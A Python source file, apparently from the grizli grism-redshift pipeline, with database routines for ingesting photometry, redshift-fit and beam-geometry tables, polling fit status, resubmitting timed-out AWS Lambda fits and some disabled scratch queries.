            status = phot['id']*0-100
            status[res['id']-1] = res['status']
            sel &= status < min_status
    if ids is None:
        ids = phot['id'][sel]
        # Select just on min_status: values > 1000 encode status*1000 (or
        # status*10000 to also apply the magnitude limits)
        # BUGFIX: guard against the default min_status=None, which made
        # `min_status > 1000` raise TypeError on Python 3
        if (min_status is not None) and (min_status > 1000):
            if min_status > 10000:
                # Include mag constraints
                res = pd.read_sql_query("SELECT root, id, status, mtime, mag_auto FROM redshift_fit,photometry_apcorr WHERE root = '{0}' AND status = {1}/10000 AND mag_auto > {2} AND mag_auto < {3} AND p_root = root AND p_id = id".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
            else:
                # just select on status
                res = pd.read_sql_query("SELECT root, id, status, mtime FROM redshift_fit WHERE root = '{0}' AND status = {1}/1000".format(root, min_status, mag_limits[0], mag_limits[1]), engine)
            ids = res['id'].tolist()
    if len(ids) == 0:
        return False
    fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name=bucket, skip_existing=False, sleep=False, skip_started=False, show_event=False, zr=zr, force_args=True, quasar_fit=False, output_path=None, save_figures='png', verbose=verbose, **extra)
    print('Add photometry: {0}'.format(root))
    grizli_db.add_phot_to_db(phot_root, delete=False, engine=engine)
    res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
    grizli_db.set_phot_root(root, phot_root, engine)
    res = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0 AND root = '{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(root), engine)
    return res
# Scratch (disabled): inspect fit status and preview the lambda event
# payload without launching anything (show_event=2)
if False:
    res = pd.read_sql_query("SELECT root, id, status, redshift, bic_diff, mtime FROM redshift_fit WHERE (root = '{0}')".format(root), engine)
    # Get arguments
    args = fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 3.4], force_args=True)
def set_phot_root(root, phot_root, engine):
    """
    Point the `phot_root` column of redshift_fit at the photometry
    catalog root for all rows of `root`.
    """
    print('Set phot_root = {0} > {1}'.format(root, phot_root))
    sql = """UPDATE redshift_fit
        SET phot_root = '{0}'
        WHERE (root = '{1}');
        """.format(phot_root, root)
    engine.execute(sql)
# Scratch (disabled): one-off phot_root repairs for specific fields
if False:
    # Check where phot_root not equal to root
    res = pd.read_sql_query("SELECT root, id, status, phot_root FROM redshift_fit WHERE (phot_root != root)".format(root), engine)
    # update the one pointing where it should change in photometry_apcorr
    engine.execute("UPDATE photometry_apcorr SET p_root = 'j214224m4420' WHERE root = 'j214224m4420gr01';")
    engine.execute("UPDATE redshift_fit SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
    engine.execute("UPDATE redshift_fit_quasar SET phot_root = 'j214224m4420' WHERE root LIKE 'j214224m4420g%%';")
# Scratch (disabled): bulk rewrite of phot_root values and objid sync
if False:
    # Replace in-place
    from grizli.aws import db as grizli_db
    engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%' AND root LIKE '%%-grism%%")
    engine.execute("update redshift_fit set phot_root = replace(root, 'g800l', 'grism') WHERE root not like 'j214224m4420%%'")
    engine.execute("update redshift_fit set phot_root = 'j214224m4420' WHERE root like 'j214224m4420gr%%'")
    engine.execute("update redshift_fit_quasar set phot_root = replace(root, 'g800l', 'grism') where root like '%%g800l%%'")
    # Set 3D-HST fields
    res = grizli_db.from_sql("select distinct root from redshift_fit where root like '%%-grism%%'", engine)
    for root in res['root']:
        grizli_db.set_phot_root(root, root, engine)
        grizli_db.set_phot_root(root.replace('-grism', '-g800l'), root, engine)
        xres = grizli_db.from_sql("select root, count(root) from redshift_fit where root like '{0}-%%' group by root".format(root.split('-')[0]), engine)
        print(xres)
    # Update OBJID for natural join
    # for tab in ['redshift_fit', 'redshift_fit_quasar', 'multibeam']
    SQL = """
    WITH sub AS (
        SELECT objid as p_objid, p_root, p_id
        FROM photometry_apcorr
    )
    UPDATE redshift_fit
    SET objid = p_objid
    FROM sub
    WHERE phot_root = p_root AND id = p_id;
    """
    grizli_db.from_sql(SQL, engine)
    engine.execute(SQL)
def wait_on_db_update(root, t0=60, dt=30, n_iter=60, engine=None):
    """
    Poll the `redshift_fit` table until the rows for `root` stop changing.

    Parameters
    ----------
    root : str
        Field root name to monitor.
    t0 : float
        Initial sleep time in seconds, used after the first query.
    dt : float
        Sleep time in seconds between subsequent polls.
    n_iter : int
        Maximum number of polling iterations.
    engine : sqlalchemy engine, optional
        Database connection, created with `grizli_db.get_db_engine` if None.

    Returns
    -------
    res : pandas.DataFrame
        Result of the last poll (columns root, id, status), or None if
        `n_iter` < 1 (previously this raised UnboundLocalError).
    """
    import pandas as pd
    from astropy.table import Table
    from grizli.aws import db as grizli_db
    import numpy as np
    import time

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Returned as-is if the loop never runs
    res = None

    n_i, n6_i, checksum_i = -1, -1, -1

    for i in range(n_iter):
        res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE root = '{0}'".format(root), engine)

        # Checksum over status values detects any change in the status
        # distribution, not just in the total counts
        checksum = (2**res['status']).sum()
        n = len(res)
        n6 = (res['status'] == 6).sum()
        n5 = (res['status'] == 5).sum()

        # Stop when nothing has changed since the previous poll
        if (n == n_i) and (checksum == checksum_i) and (n6 == n6_i):
            break

        now = utils.nowtime()
        print('{0}, {1}: n={2:<5d} n5={5:<5d} n6={3:<5d} checksum={4}'.format(root, now, n, n6, checksum, n5))

        n_i, n6_i, checksum_i = n, n6, checksum

        # Longer initial wait, then a shorter polling interval
        if i == 0:
            time.sleep(t0)
        else:
            time.sleep(dt)

    return res
##
def fit_timeouts(root='j004404m2034', mag_limits=[15, 26], sn_limit=7, min_status=None, engine=None):
    """
    Re-run lambda redshift fits for all objects of `root` whose
    `redshift_fit.status` is 5 (timed out), then wait for the database
    to stop updating.

    Parameters
    ----------
    root : str
        Field root name.
    mag_limits, sn_limit, min_status :
        Currently unused by the function body; kept for call
        compatibility.
    engine : sqlalchemy engine, optional
        Created with `grizli_db.get_db_engine()` if None.

    Returns
    -------
    True if no status = 5 objects were found, otherwise the final
    DataFrame returned by `wait_on_db_update`.
    """
    from grizli.aws import fit_redshift_lambda
    from grizli import utils
    from grizli.aws import db as grizli_db
    if engine is None:
        engine = grizli_db.get_db_engine()

    import pandas as pd
    import numpy as np
    import glob
    import os

    # Objects that timed out (status = 5)
    res = pd.read_sql_query("SELECT id, status FROM redshift_fit WHERE root = '{0}' AND status = 5".format(root), engine)
    if len(res) == 0:
        return True

    ids = res['id'].tolist()

    # Resubmit the fits to AWS lambda
    fit_redshift_lambda.fit_lambda(root=root, beams=[], ids=ids, newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=False, zr=[0.01, 2.4], force_args=True)

    # Block until the table stops changing
    res = grizli_db.wait_on_db_update(root, dt=15, n_iter=120, engine=engine)
    return res

    # ------------------------------------------------------------------
    # NOTE(review): everything below is unreachable (after `return`);
    # interactive scratch snippets kept for reference.
    # ------------------------------------------------------------------
    # All timeouts
    events = fit_redshift_lambda.fit_lambda(root='egs-g800l-j141956p5255', beams=[], ids=[20667], newfunc=False, bucket_name='grizli-v1', skip_existing=False, sleep=False, skip_started=False, quasar_fit=False, output_path=None, show_event=2, zr=[0.01, 2.4], force_args=True)

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' ORDER BY root".format(root), engine)

    base = {'bucket': 'grizli-v1', 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,2.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png'}
    all_events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=True)

    #################
    # Fit locally on EC2
    i0 = 0

    import os
    import pandas as pd
    import numpy as np
    from grizli.aws import db as grizli_db
    from grizli.aws import fit_redshift_lambda, lambda_handler
    engine = grizli_db.get_db_engine(echo=False)

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root LIKE '%%-grism%%' ORDER BY root", engine)
    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root NOT LIKE 'cos-grism%%' AND root NOT LIKE '%%-grism%%' AND root NOT LIKE '%%g800l%%' ORDER BY root", engine)
    bucket = 'grizli-v1'

    res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'j114936p2222' ORDER BY id", engine)
    bucket = 'grizli-v1'

    # res = pd.read_sql_query("SELECT root, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'cos-grism%%' order by id", engine)
    # bucket = 'grizli-cosmos-v2'

    N = len(res)
    np.random.seed(1)
    so = np.argsort(np.random.normal(size=N))

    base = {'bucket': bucket, 'skip_started': False, 'quasar_fit': False, 'zr': '0.01,3.4', 'force_args': True, 'bad_pa_threshold': 10, 'use_phot_obj': False, 'save_figures': 'png', 'verbose': True, 'working_directory': os.getcwd()}
    events = fit_redshift_lambda.generate_events(res['root'], res['id'], base=base, send_to_lambda=False)

    # Run every other event in this process
    for event in events[i0::2]:
        lambda_handler.handler(event, {})

    ########
    xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
    print(len(res), len(xres))

    # show points
    xres = pd.read_sql_query("SELECT root, p_ra as ra, p_dec as dec, id, status FROM redshift_fit WHERE status = 5 AND root LIKE 'gds-grism%%' ORDER BY root".format(root), engine)
# Photometry table
def set_filter_bits(phot, filters=None):
    """
    Set bitmask columns indicating which filters are available.

    Adds two `np.uint32` columns to `phot` **in place**:

    - 'filter_bit' : bitwise OR of 2**i for every filter i with a
      finite '{filt}_flux_aper_0' value.
    - 'red_bit' : only the bit of the *reddest* available filter, i.e.,
      the first filter in `filters` (ordered red -> blue) that has a
      finite flux for that row.

    Parameters
    ----------
    phot : table-like
        Photometry table providing `colnames` and column access by name
        (e.g., `astropy.table.Table`).
    filters : list of str, optional
        Filter names ordered from red to blue; bit i corresponds to
        2**i in list order.  Defaults to the standard HST set used
        previously, so the default bit assignment is unchanged.
    """
    import numpy as np

    if filters is None:
        # Red to blue; the order fixes the bit assignment, so it must
        # stay stable for existing database entries
        filters = ['f160w', 'f140w', 'f125w', 'f110w', 'f105w', 'f098m', 'f850lp', 'f814w', 'f775w', 'f625w', 'f606w', 'f475w', 'f438w', 'f435w', 'f555w', 'f350lp', 'f390w', 'f336w', 'f275w', 'f225w']

    bits = [np.uint32(2**i) for i in range(len(filters))]

    phot['filter_bit'] = np.zeros(len(phot), dtype=np.uint32)
    phot['red_bit'] = np.zeros(len(phot), dtype=np.uint32)

    for i, filt in enumerate(filters):
        col = '{0}_flux_aper_0'.format(filt)
        if col in phot.colnames:
            # Mark as "reddest" only where no redder filter was already found
            red = bits[i] * np.isfinite(phot[col]) * (phot['filter_bit'] == 0)
            phot['filter_bit'] |= bits[i] * np.isfinite(phot[col])
            phot['red_bit'] |= red
            print(filt, i, bits[i], red.max())
def phot_to_dataframe(phot, root):
    """
    Convert a `{root}_phot_apcorr.fits` table to a pandas DataFrame
    ready for the `photometry_apcorr` database table.

    Modifies `phot` in place:
      - adds a 'root' column,
      - sets the filter bitmask columns (`set_filter_bits`),
      - removes the "dummy" placeholder columns,
      - prefixes bounding-box columns with 'image_' and the identifier
        columns ('root', 'id', 'ra', 'dec') with 'p_'.
    """
    phot['root'] = root

    set_filter_bits(phot)

    # Placeholder columns that should not go into the database
    for dummy in ('dummy_flux', 'dummy_err'):
        if dummy in phot.colnames:
            phot.remove_column(dummy)

    # Rename to avoid clashes with columns of other DB tables
    for box in ('xmin', 'xmax', 'ymin', 'ymax'):
        phot.rename_column(box, 'image_' + box)

    for key in ('root', 'id', 'ra', 'dec'):
        phot.rename_column(key, 'p_' + key)

    return phot.to_pandas()
def add_phot_to_db(root, delete=False, engine=None, nmax=500):
    """
    Read the table {root}_phot_apcorr.fits and append it to the grizli_db
    `photometry_apcorr` table.

    Parameters
    ----------
    root : str
        Field root; reads '{root}_phot_apcorr.fits' from the working
        directory.
    delete : bool
        If rows for `root` already exist in the table, delete them
        first.  If False and rows exist, do nothing and return False.
    engine : sqlalchemy engine, optional
        Created with `grizli_db.get_db_engine(echo=False)` if None.
    nmax : int
        Upload chunk size; if > 0 the rows are sent in chunks of `nmax`
        to keep individual INSERT statements small.
    """
    import pandas as pd
    from astropy.table import Table
    from grizli.aws import db as grizli_db
    import numpy as np

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Are there already rows for this root?
    res = pd.read_sql_query("SELECT p_root, p_id FROM photometry_apcorr WHERE p_root = '{0}'".format(root), engine)
    if len(res) > 0:
        if delete:
            print('Delete rows where root={0}'.format(root))
            res = engine.execute("DELETE from photometry_apcorr WHERE (p_root = '{0}')".format(root))

            if False:
                # (disabled) also remove the matching redshift fits
                res = engine.execute("DELETE from redshift_fit WHERE (root = '{0}')".format(root))
        else:
            print('Data found for root={0}, delete them if necessary'.format(root))
            return False

    # Read the catalog
    phot = Table.read('{0}_phot_apcorr.fits'.format(root), character_as_bytes=False)

    # remove columns that are not stored in the database
    remove = []
    for c in phot.colnames:
        if ('_corr_' in c) | ('_ecorr_' in c) | (c[-5:] in ['tot_4', 'tot_5', 'tot_6']) | ('dummy' in c):
            remove.append(c)

    phot.remove_columns(remove)

    # Add new filter columns if necessary: an empty query returns just
    # the existing table schema for comparison
    empty = pd.read_sql_query("SELECT * FROM photometry_apcorr WHERE false", engine)

    df = phot_to_dataframe(phot, root)
    new_cols = []
    for c in df.columns:
        if c not in empty.columns:
            new_cols.append(c)

    if len(new_cols) > 0:
        for c in new_cols:
            print('Add column {0} to `photometry_apcorr` table'.format(c))
            sql = "ALTER TABLE photometry_apcorr ADD COLUMN {0} real;".format(c)
            res = engine.execute(sql)

    # Add new table
    print('Send {0}_phot_apcorr.fits to `photometry_apcorr`.'.format(root))
    if nmax > 0:
        # Split the upload into chunks of nmax rows
        N = len(phot) // nmax
        for i in range(N+1):
            print('   add rows {0:>5}-{1:>5} ({2}/{3})'.format(i*nmax, (i+1)*nmax, i+1, N+1))
            df[i*nmax:(i+1)*nmax].to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
    else:
        df.to_sql('photometry_apcorr', engine, index=False, if_exists='append', method='multi')
def multibeam_to_database(beams_file, engine=None, Rspline=15, force=False, **kwargs):
    """
    Send statistics of the beams.fits file to the database.

    Populates one row of the `multibeam` table with masked-pixel
    statistics and a spline-continuum fit summary, and one row per
    beam of the `beam_geometry` table.

    Parameters
    ----------
    beams_file : str
        Filename like '{root}_{id:05d}.beams.fits'; `root` and `id` are
        parsed from the name.
    engine : sqlalchemy engine, optional
        Created with `get_db_engine(echo=False)` if None.
    Rspline : int
        Spline resolution for the continuum-only template fit.
    force : bool
        Resend even if an entry with the same file modification time
        already exists.
    kwargs : dict
        Passed to `multifit.MultiBeam`.

    Returns
    -------
    True if the file was already ingested (and `force` is False),
    otherwise None after updating the tables.
    """
    import numpy as np
    import pandas as pd
    from astropy.time import Time

    from .. import multifit, utils

    if engine is None:
        engine = get_db_engine(echo=False)

    # File modification time, used to skip files already ingested
    mtime = Time(os.stat(beams_file).st_mtime, format='unix').iso

    root = beams_file.split('_')[0]
    id = int(beams_file.split('_')[1].split('.')[0])

    res = pd.read_sql_query("SELECT mtime from multibeam WHERE (root = '{0}' AND id = {1})".format(root, id), engine)
    if len(res) == 1:
        if (res['mtime'][0] == mtime) & (not force):
            print('{0} already in multibeam table'.format(beams_file))
            return True

    mb = multifit.MultiBeam(beams_file, **kwargs)
    print('Update `multibeam` and `beam_geometry` tables for {0}.'.format(beams_file))

    # Dummy for loading the templates the same way as for the quasars
    # for generating the spline fit
    templ_args = {'uv_line_complex': True,
                  'broad_fwhm': 2800,
                  'narrow_fwhm': 1000,
                  'fixed_narrow_lines': True,
                  'Rspline': Rspline,
                  'include_reddened_balmer_lines': False}

    q0, q1 = utils.load_quasar_templates(**templ_args)

    # Keep only the spline (continuum) templates
    for t in list(q0.keys()):
        if 'bspl' not in t:
            q0.pop(t)

    tfit = mb.template_at_z(0, templates=q0, fitter='lstsq')
    sp = tfit['line1d'].wave, tfit['line1d'].flux
    m2d = mb.get_flat_model(sp, apply_mask=True, is_cgs=True)

    mb.initialize_masked_arrays()

    # chi2 of the data against a zero model
    chi0 = (mb.scif_mask**2*mb.ivarf[mb.fit_mask]).sum()

    # Percentiles of masked contam, sci, err and contam/sci
    pvals = np.arange(5, 96, 5)
    mpos = m2d > 0
    contam_percentiles = np.percentile(mb.contamf_mask, pvals)
    sci_percentiles = np.percentile(mb.scif_mask, pvals)
    err_percentiles = np.percentile(1/mb.sivarf[mb.fit_mask], pvals)
    sn_percentiles = np.percentile(mb.scif_mask*mb.sivarf[mb.fit_mask], pvals)
    fcontam_percentiles = np.percentile(mb.contamf_mask/mb.scif_mask, pvals)

    # multibeam dataframe
    df = pd.DataFrame()

    # `np.float` was an alias of the builtin float and was removed in
    # numpy >= 1.24; using the builtin is behaviorally identical
    float_type = float

    df['root'] = [root]
    df['id'] = [id]
    df['objid'] = [-1]
    df['mtime'] = [mtime]
    df['status'] = [6]
    df['scip'] = [list(sci_percentiles.astype(float_type))]
    df['errp'] = [list(err_percentiles.astype(float_type))]
    df['snp'] = [list(sn_percentiles.astype(float_type))]
    df['snmax'] = [float_type((mb.scif_mask*mb.sivarf[mb.fit_mask]).max())]
    df['contamp'] = [list(contam_percentiles.astype(float_type))]
    df['fcontamp'] = [list(fcontam_percentiles.astype(float_type))]
    df['chi0'] = [np.int32(chi0)]
    df['rspline'] = [Rspline]
    df['chispl'] = [np.int32(tfit['chi2'])]
    df['mb_dof'] = [mb.DoF]
    df['wmin'] = [np.int32(mb.wave_mask.min())]
    df['wmax'] = [np.int32(mb.wave_mask.max())]

    # Input args
    for a in ['fcontam', 'sys_err', 'min_sens', 'min_mask']:
        df[a] = [getattr(mb, a)]

    # Send to DB
    # NOTE(review): `engine` passed as the second positional argument to
    # `execute` would be interpreted as statement parameters; looks
    # unintentional -- confirm against the sqlalchemy version in use
    res = engine.execute("DELETE from multibeam WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)

    df.to_sql('multibeam', engine, index=False, if_exists='append', method='multi')

    # beams dataframe: one row per individual grism exposure beam
    d = {}
    for k in ['root', 'id', 'objid', 'filter', 'pupil', 'pa', 'instrument', 'fwcpos', 'order', 'parent', 'parent_ext', 'ccdchip', 'sci_extn', 'exptime', 'origin_x', 'origin_y', 'pad', 'nx', 'ny', 'sregion']:
        d[k] = []

    for beam in mb.beams:
        d['root'].append(root)
        d['id'].append(id)
        d['objid'].append(-1)

        for a in ['filter', 'pupil', 'instrument', 'pad',
                  'fwcpos', 'ccdchip', 'sci_extn', 'exptime']:
            d[a].append(getattr(beam.grism, a))

        d['order'].append(beam.beam.beam)

        parent = beam.grism.parent_file.replace('.fits', '').split('_')
        d['parent'].append(parent[0])
        d['parent_ext'].append(parent[1])

        # origin is stored (y, x)
        d['origin_x'].append(beam.grism.origin[1])
        d['origin_y'].append(beam.grism.origin[0])
        d['nx'].append(beam.sh[1])
        d['ny'].append(beam.sh[0])

        # Footprint polygon of the beam cutout
        f = beam.grism.wcs.calc_footprint().flatten()
        fs = ','.join(['{0:.6f}'.format(c) for c in f])
        d['sregion'].append('POLYGON({0})'.format(fs))

        d['pa'].append(int(np.round(beam.get_dispersion_PA())))

    df = pd.DataFrame.from_dict(d)

    # Send to database
    res = engine.execute("DELETE from beam_geometry WHERE (root = '{0}' AND id = {1})".format(mb.group_name, mb.id), engine)

    df.to_sql('beam_geometry', engine, index=False, if_exists='append', method='multi')
if False:
    # Fix multibeam arrays: one-off migration converting the
    # string-serialized percentile columns into native postgres
    # real[] array columns via a temporary table.
    import pandas as pd
    import numpy as np
    from sqlalchemy import types
    from grizli.aws import db as grizli_db
    engine = grizli_db.get_db_engine()

    df = pd.read_sql_query('select id, root, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)

    c = 'snp'

    data = pd.DataFrame()
    data['id'] = df['id']
    data['root'] = df['root']
    dtype = {'root': types.String, 'id': types.Integer}

    # Parse each "[v1, v2, ...]" string back into a float list
    # NOTE(review): np.cast was removed in numpy 2.0 -- this dead
    # snippet would need np.asarray(..., dtype=float) if revived
    for c in df.columns:
        if c.endswith('p'):
            print(c)
            dtype[c[:-1]+'_p'] = types.ARRAY(types.FLOAT)
            data[c[:-1]+'_p'] = [list(np.cast[float](line.strip()[1:-1].split(','))) for line in df[c]]

    data.to_sql('multibeam_tmp', engine, index=False, if_exists='append', method='multi')

    from sqlalchemy import types
    for c in df.columns:
        if c.endswith('p'):
            pass

    # Print (do not execute) the ALTER/UPDATE statements to run by hand
    for c in df.columns:
        if c.endswith('p'):
            sql = "ALTER TABLE multibeam ADD COLUMN {0} real[];".format(c[:-1]+'_p')
            print(sql)

            sql = "UPDATE multibeam mb SET {new} = tmp.{new} FROM multibeam_tmp tmp WHERE tmp.id = mb.id AND tmp.root = mb.root;".format(new=c[:-1]+'_p')
            print(sql)

    x = grizli_db.from_sql('select id, scip, errp, snp, contamp, fcontamp from multibeam mb', engine)
def test_join():
    """
    Scratch queries demonstrating joins between `photometry_apcorr`
    and `redshift_fit` (uses the module-level `engine`).
    """
    import pandas as pd

    # Selected columns for every object with a redshift fit
    df = pd.read_sql_query("SELECT root, id, flux_radius, mag_auto, z_map, status, bic_diff, zwidth1, log_pdf_max, chinu FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)

    # Same join, all columns
    df = pd.read_sql_query("SELECT * FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE z_map > 0) z ON (p.p_root = z.root AND p.p_id = z.id)", engine)

    # on root
    field = 'xxx'
    df = pd.read_sql_query("SELECT p.root, p.id, mag_auto, z_map, status FROM photometry_apcorr AS p JOIN (SELECT * FROM redshift_fit WHERE root='{0}') z ON (p.p_root = z.root AND p.p_id = z.id)".format(field), engine)
def column_comments():
    """
    Generate / apply per-column comments for a DB table via a YAML file.

    Creates '{tablename}_comments.yml' with a '---' placeholder for
    each column if the file doesn't exist.  After the file has been
    edited by hand, builds the `COMMENT ON COLUMN` SQL for every
    non-placeholder entry.

    Returns
    -------
    SQL : str
        Concatenated `COMMENT ON COLUMN ...;` statements.  (Previously
        the built SQL was discarded; it is now returned so it can be
        executed by the caller.)
    """
    from collections import OrderedDict
    import yaml

    tablename = 'redshift_fit'

    # Empty query just to retrieve the column names
    cols = pd.read_sql_query('select * from {0} where false'.format(tablename), engine)

    d = {}  # OrderedDict{}
    for c in cols.columns:
        d[c] = '---'

    if not os.path.exists('{0}_comments.yml'.format(tablename)):
        print('Init {0}_comments.yml'.format(tablename))

        fp = open('{0}_comments.yml'.format(tablename), 'w')
        yaml.dump(d, stream=fp, default_flow_style=False)
        fp.close()

    # Edit file by hand, then reload it here.  safe_load: the file is
    # plain data, and yaml.load without an explicit Loader is
    # deprecated and unsafe.
    comments = yaml.safe_load(open('{0}_comments.yml'.format(tablename)))

    SQL = ""
    upd = "COMMENT ON COLUMN {0}.{1} IS '{2}';\n"
    for col in comments:
        if comments[col] != '---':
            SQL += upd.format(tablename, col, comments[col])
        else:
            print('Skip ', col)

    return SQL
def add_spectroscopic_redshifts(xtab, rmatch=1, engine=None, db=None):
    """
    Add spectroscopic redshifts to the photometry_apcorr table.

    Parameters
    ----------
    xtab : table-like
        Input table; needs (at least) columns
        ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual'].
    rmatch : float
        Sky-match radius for associating input rows with photometry
        entries (same units as `match_to_catalog_sky` separations;
        presumably arcsec -- confirm against GTable implementation).
    engine : sqlalchemy engine, optional
        Created with `grizli_db.get_db_engine(echo=False)` if None.
    db : `~grizli.utils.GTable`, optional
        Cached master (root, id, ra, dec) table; queried from
        `photometry_apcorr` if None.

    Returns
    -------
    False if required columns are missing, otherwise None after the
    database update.
    """
    import glob
    import pandas as pd
    from astropy.table import vstack
    from grizli.aws import db as grizli_db
    from grizli import utils

    # Check required columns
    for c in ['ra', 'dec', 'z_spec', 'z_spec_src', 'z_spec_qual_raw', 'z_spec_qual']:
        if c not in xtab.colnames:
            print('Column {0} not found in input table'.format(c))
            return False

    if engine is None:
        engine = grizli_db.get_db_engine(echo=False)

    # Force data types
    tab = xtab[xtab['z_spec'] >= 0]

    # Drop rows with masked coordinates
    if hasattr(tab['ra'], 'mask'):
        tab = tab[~tab['ra'].mask]

    # *1 casts possibly-boolean / masked quality columns to integers
    tab['z_spec_qual'] = tab['z_spec_qual']*1
    tab['z_spec_qual_raw'] = tab['z_spec_qual_raw']*1

    if False:
        # duplicates
        fit = grizli_db.from_sql("select root, ra, dec from redshift_fit", engine)
        fit = grizli_db.from_sql("select root, ra, dec from redshift_fit where ra is null", engine)

    # Select master table
    if db is None:
        res = pd.read_sql_query("SELECT p_root, p_id, p_ra, p_dec, z_spec from photometry_apcorr", engine)
        db = utils.GTable.from_pandas(res)
        for c in ['p_root', 'p_id', 'p_ra', 'p_dec']:
            db.rename_column(c, c[2:])

    # Sky-match the input rows to the master photometry positions
    idx, dr = db.match_to_catalog_sky(tab)
    hasm = (dr.value < rmatch) & (tab['z_spec'] >= 0)

    tab['z_spec_dr'] = dr.value
    tab['z_spec_ra'] = tab['ra']
    tab['z_spec_dec'] = tab['dec']

    tab['db_root'] = db['root'][idx]
    tab['db_id'] = db['id'][idx]

    tabm = tab[hasm]['db_root', 'db_id', 'z_spec', 'z_spec_src', 'z_spec_dr', 'z_spec_ra', 'z_spec_dec', 'z_spec_qual_raw', 'z_spec_qual']

    print('Send zspec to photometry_apcorr (N={0})'.format(hasm.sum()))

    # Stage the matches in a temporary table, then UPDATE by join
    df = tabm.to_pandas()
    df.to_sql('z_spec_tmp', engine, index=False, if_exists='replace', method='multi')

    SQL = """UPDATE photometry_apcorr
     SET z_spec = zt.z_spec,
         z_spec_src = zt.z_spec_src,
         z_spec_dr = zt.z_spec_dr,
         z_spec_ra = zt.z_spec_ra,
         z_spec_dec = zt.z_spec_dec,
         z_spec_qual_raw = zt.z_spec_qual_raw,
         z_spec_qual = zt.z_spec_qual
     FROM z_spec_tmp as zt
     WHERE (zt.db_root = p_root AND zt.db_id = p_id);
    """

    engine.execute(SQL)

    if False:
        # Update redshift_fit ra/dec with photometry_table double prec.
        # NOTE(review): dead code and never executed; the SET clause
        # appears to be missing a comma between `ra = p_ra` and
        # `dec = p_dec` -- confirm before enabling.
        SQL = """UPDATE redshift_fit
     SET ra = p_ra
         dec = p_dec
     FROM photometry_apcorr
     WHERE (phot_root = p_root AND id = p_id AND root = 'j123556p6221');
    """
def mtime_to_iso(ct):
    """
    Convert a ctime-style timestamp (e.g. 'Mon Jan  6 08:09:10 2020')
    to an ISO-like 'YYYY-MM-DD HH:MM:SS' string suitable for sorting.
    """
    month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']

    fields = ct.split()

    day = int(fields[2])
    month = month_names.index(fields[1]) + 1
    year = fields[-1]
    clock = fields[-2]

    return f'{year}-{month:02d}-{day:02d} {clock}'
def various_selections():
    """
    Scratchbook of sample selections run against the grizli database
    and exported as HTML summary tables with `make_html_table`.

    NOTE(review): relies on module-level `engine`, `pd`, `np`, `utils`
    and `make_html_table`, and on `root` defined partway through; the
    sections are meant to be executed interactively one at a time, not
    by calling this function.
    """
    from grizli.aws import db as grizli_db

    # sdss z_spec
    res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^sdss-dr15'", table_root='sdss_zspec', sync='s3://grizli-v1/tables/')

    # objects with carla redshifts (radio loud)
    res = make_html_table(engine=engine, columns=['root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'log_pdf_max'], where="AND status > 5 AND z_spec > 0 AND z_spec_qual = 1 AND z_spec_src ~ '^carla'", table_root='carla_zspec', sync='s3://grizli-v1/tables/')

    # Bright galaxies with q_z flag
    res = grizli_db.make_html_table(engine=engine, columns=['mtime', 'root', 'status', 'id', 'p_ra', 'p_dec', 'mag_auto', 'flux_radius', 't_g800l', 't_g102', 't_g141', 'z_spec', 'z_map', 'bic_diff', 'chinu', 'zwidth1/(1+z_map) as zw1', 'q_z', 'q_z > -0.69 as q_z_TPR90', 'dlinesn'], where="AND status > 4 AND mag_auto < 22 AND z_map > 1.3", table_root='bright', sync='s3://grizli-v1/tables/', png_ext=['R30', 'stack', 'full', 'line'], show_hist=True)

    # High-z compiliation
